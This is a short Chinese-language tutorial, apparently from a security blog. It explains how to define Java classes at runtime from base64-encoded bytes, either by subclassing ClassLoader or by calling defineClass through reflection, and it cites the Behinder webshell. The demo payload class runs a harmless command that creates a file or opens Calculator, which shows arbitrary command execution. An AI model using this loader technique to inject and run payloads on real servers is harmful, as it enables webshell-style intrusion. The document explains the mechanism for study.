0x01 原理介紹
首先要讓服務端有動态地将位元組流解析成Class的能力,這是基礎。
正常情況下,Java并沒有提供直接解析class位元組數組的接口。不過classloader内部實作了一個protected的defineClass方法,可以将byte[]直接轉換為Class,方法原型如下:
因為該方法是protected的,我們沒辦法在外部直接調用,當然我們可以通過反射來修改保護屬性,不過我們選擇一個更友善的方法,直接自定義一個類繼承classloader,然後在子類中調用父類的defineClass方法。
下面是一個簡單的Demo:
public class Demo {
public static class Myloader extends ClassLoader {
public Class get(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
// 使用繼承ClassLoader的方法
public static Class<?> getClass(String classCode) throws IOException, InstantiationException, IllegalAccessException {
BASE64Decoder code = new BASE64Decoder();
Class result = new Myloader().get(code.decodeBuffer(classCode));
return (Class<?>)result;
}
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
String classStr = "yv66vgAAADQAQgoADwAjCAAkCAAlCgAmACcKACgAKQgAKgoAKAArCAAsCgAtAC4KAC0ALwcAMAoACwAxCAAyBwAzBwA0AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABpMY29tL2FudHNlYy9kdXBlaS9QYXlsb2FkOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAdjb21tYW5kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHADUHADMHADABAApTb3VyY2VGaWxlAQAMUGF5bG9hZC5qYXZhDAAQABEBAB50b3VjaCAvdG1wL215X3RyYW5zbGV0X3BheWxvYWQBAAdvcy5uYW1lBwA2DAA3ADgHADUMADkAGAEAA21hYwwAOgA7AQA9L1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAvQ29udGVudHMvTWFjT1MvQ2FsY3VsYXRvcgcAPAwAPQA+DAA/AEABABNqYXZhL2lvL0lPRXhjZXB0aW9uDABBABEBAAJPSwEAGGNvbS9hbnRzZWMvZHVwZWkvUGF5bG9hZAEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAt0b0xvd2VyQ2FzZQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEADgAPAAAAAAACAAEAEAARAAEAEgAAAC8AAQABAAAABSq3AAGxAAAAAgATAAAABgABAAAACQAUAAAADAABAAAABQAVABYAAAABABcAGAABABIAAACnAAIAAgAAACkSAkwSA7gABLYABRIGtgAHmQAGEghMuAAJK7YAClenAAhMK7YADBINsAABAAAAHgAhAAsAAwATAAAAIgAIAAAADgADAA8AEwARABYAEwAeABcAIQAUACIAFgAmABgAFAAAACAAAwADABsAGQAaAAEAIgAEABsAHAABAAAAKQAVABYAAAAdAAAAFgAD/AAWBwAe/wAKAAEHAB8AAQcAIAQAAQAhAAAAAgAi";
Class<?> result = getClass(classStr);
System.out.println(result.newInstance().toString());
}
}
上面代碼中的classStr變量的值就是如下這個類編譯之後的class檔案的base64編碼:
package com.antsec.dupei;
import java.io.IOException;
/**
* @author [email protected]
* @date 2021/8/11 11:19
*/
public class Payload {
@Override
public String toString() {
// TODO Auto-generated method stub
try {
String command = "touch /tmp/my_translet_payload";
if (System.getProperty("os.name").toLowerCase().startsWith("mac")) {
// 在MacOS上打開電腦
command = "/System/Applications/Calculator.app/Contents/MacOS/Calculator";
}
Runtime.getRuntime().exec(command);
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
return "OK";
}
}
到此,我們就可以直接動态解析并執行編譯好的class位元組流了。
除了上述使用內建classloader的方式調用defineClass之外,也可以使用反射機制,這個在新版的冰蠍中,以及開始使用了。
// 使用反射的方法
public static Class<?> getClass2(String classCode) throws IOException, InvocationTargetException,
IllegalAccessException, NoSuchMethodException, InstantiationException {
ClassLoader loader = Thread.currentThread().getContextClassLoader();
BASE64Decoder base64Decoder = new BASE64Decoder();
byte[] bytes = base64Decoder.decodeBuffer(classCode);
Method method = null;
Class<?> clz = loader.getClass();
while (method == null && clz != Object.class) {
try {
method = clz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
} catch (NoSuchMethodException ex) {
clz = clz.getSuperclass();
}
}
if (method != null) {
method.setAccessible(true);
return (Class<?>) method.invoke(loader, bytes, 0, bytes.length);
}
return null;
}
0x02 參考
● 冰蠍: https://github.com/rebeyond/Behinder